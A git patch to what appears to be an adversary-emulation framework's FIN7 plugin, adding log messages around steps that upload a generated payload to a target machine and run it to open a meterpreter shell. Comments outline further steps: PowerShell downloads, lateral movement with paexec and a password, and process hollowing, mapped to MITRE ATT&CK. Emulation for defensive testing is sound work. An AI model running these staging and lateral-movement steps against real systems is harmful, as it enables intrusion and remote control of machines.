From 0295fd88020c08853b4f0f0be99684e7b366512c Mon Sep 17 00:00:00 2001
From: Thorsten Sick <thorsten.sick@avast.com>
Date: Tue, 8 Jun 2021 12:06:31 +0200
Subject: [PATCH] using log level for output

---
 .../adversary_emulations/FIN7/fin7_section1.py      | 13 ++++++++++++-
 1 file changed, 12 insertions(+), 1 deletion(-)

diff --git a/plugins/default/adversary_emulations/FIN7/fin7_section1.py b/plugins/default/adversary_emulations/FIN7/fin7_section1.py
index 96d39c3..a8f92f1 100644
--- a/plugins/default/adversary_emulations/FIN7/fin7_section1.py
+++ b/plugins/default/adversary_emulations/FIN7/fin7_section1.py
@@ -93,6 +93,9 @@ class FIN7Plugin(AttackPlugin):
         self.attack_logger.vprint(
             f"{CommandlineColors.OKBLUE}Step 4: Staging Interactive Toolkit{CommandlineColors.ENDC}", 1)
 
+        self.attack_logger.vprint(
+            f"{CommandlineColors.OKCYAN}Create babymetal replacement{CommandlineColors.ENDC}",
+            1)
         # Uploaded stager creates meterpreter shell (babymetal)
         # Generate payload:
 
@@ -106,11 +109,19 @@ class FIN7Plugin(AttackPlugin):
                                outfile=payload_name)
         self.attacker_machine_plugin.get(payload_name, self.targets[0].get_machine_path_external())
         src = os.path.join(self.targets[0].get_machine_path_external(), payload_name)
+
+        self.attack_logger.vprint(
+            f"{CommandlineColors.OKCYAN}Deploy babymetal replacement{CommandlineColors.ENDC}",
+            1)
         self.targets[0].put(src, self.targets[0].get_playground())
         if self.targets[0].get_playground() is not None:
             pl = os.path.join(self.targets[0].get_playground(), payload_name)
         else:
             pl = payload_name
+
+        self.attack_logger.vprint(
+            f"{CommandlineColors.OKCYAN}Execute babymetal replacement - waiting for meterpreter shell{CommandlineColors.ENDC}",
+            1)
         self.targets[0].remote_run(pl, disown=True)
 
         # adb156.exe -> cmd.exe ->powershell.exe decodes embedded dll payload https://attack.mitre.org/techniques/T1059/003/ and https://attack.mitre.org/techniques/T1059/001/
@@ -144,7 +155,7 @@ class FIN7Plugin(AttackPlugin):
 
         # powershell download: paexec.exe and hollow.exe https://attack.mitre.org/techniques/T1105/
         # spawn powershell through cmd
-        # use password with paexec to move lateral to it admin host https://attack.mitre.org/techniques/T1021/002/
+        # !!! admin host!!! use password with paexec to move lateral to it admin host https://attack.mitre.org/techniques/T1021/002/
         # paexec  starts temorary windows service and executes hollow.exe https://attack.mitre.org/techniques/T1021/002/
         # hollow.exe spawns svchost and unmaps memory image https://attack.mitre.org/techniques/T1055/012/
         # svchost starts data exchange